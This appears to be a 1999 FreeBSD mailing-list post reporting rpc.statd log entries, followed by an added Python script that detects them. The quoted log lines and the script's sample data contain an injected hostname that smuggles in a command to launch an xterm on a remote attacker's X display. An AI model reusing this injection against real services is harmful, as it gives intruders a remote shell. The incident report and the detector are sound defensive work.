Date:      Sun, 21 Feb 1999 14:12:43 +1030
From:      Greg Lehey <grog@lemis.com>
To:        FreeBSD Hackers <hackers@freebsd.org>, FreeBSD-isp@freebsd.org
Subject:   New breakin technique?
Message-ID:  <19990221141243.G93492@lemis.com>

I've just found the following messages in my logs:

Feb 21 10:13:11 freebie rpc.statd: Invalid hostname to sm_mon: ;/usr/openwin/bin/xterm -display 207.193.26.132:0
Feb 21 10:13:14 freebie rpc.statd: Invalid hostname to sm_mon: ;/usr/openwin/bin/xterm -display 207.193.26.132:0
Feb 21 13:41:55 freebie rpc.statd: Invalid hostname to sm_mon: ;/usr/openwin/bin/xterm -display 207.193.26.82:0;

Has anybody seen something like this?  It looks as if somebody is
trying to break in, but I didn't know that rpc.statd could start
xterms.

Under these circumstances, it would be interesting to know if
rpc.statd *must* run as root.  Wouldn't, say, bin be enough?

Greg
--
See complete headers for address, home page and phone numbers
finger grog@lemis.com for PGP public key
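
Added example, not part of the original message: a log check that flags rpc.statd "Invalid hostname to sm_mon" entries whose rejected name contains shell metacharacters, and groups them by the X display host named in the entry. The function names and the optional "[pid]" in the pattern are assumptions; the first three sample lines are the ones quoted above.

```python
import re
from collections import Counter

# The first three lines are the entries quoted in the message; the last line is
# constructed to show that unrelated syslog entries are ignored.
SAMPLE_LOG = """\
Feb 21 10:13:11 freebie rpc.statd: Invalid hostname to sm_mon: ;/usr/openwin/bin/xterm -display 207.193.26.132:0
Feb 21 10:13:14 freebie rpc.statd: Invalid hostname to sm_mon: ;/usr/openwin/bin/xterm -display 207.193.26.132:0
Feb 21 13:41:55 freebie rpc.statd: Invalid hostname to sm_mon: ;/usr/openwin/bin/xterm -display 207.193.26.82:0;
Feb 21 13:50:02 freebie sshd[411]: Connection closed by 192.0.2.7
"""

# Layout taken from the quoted entries; the optional "[pid]" is an assumption.
STATD = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s[\d:]{8})\s(?P<host>\S+)\srpc\.statd(?:\[\d+\])?:\s"
    r"Invalid hostname to sm_mon:\s(?P<name>.*)$"
)
# Characters a shell would interpret; none can occur in a real hostname.
SHELL_META = set(";|&`$<>(){}\\'\"")
# X11 display target, i.e. where the requested xterm would open its window.
DISPLAY = re.compile(r"-display\s+(\S+?):\d+")


def scan(log_text):
    """Return one finding per rejected sm_mon name that looks like a command."""
    findings = []
    for line in log_text.splitlines():
        m = STATD.match(line)
        if not m:
            continue
        name = m["name"]
        meta = sorted(SHELL_META & set(name))
        if not meta and "/" not in name and " " not in name:
            continue  # malformed name, but nothing command-like in it
        target = DISPLAY.search(name)
        findings.append({
            "timestamp": m["ts"],
            "logged_on": m["host"],
            "meta": meta,
            "display_host": target.group(1) if target else None,
        })
    return findings


def count_by_display(findings):
    """Group findings by the remote X display the command pointed at."""
    return dict(Counter(f["display_host"] for f in findings))


if __name__ == "__main__":
    for host, n in count_by_display(scan(SAMPLE_LOG)).items():
        print(f"{n} attempt(s) naming X display {host}")
```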

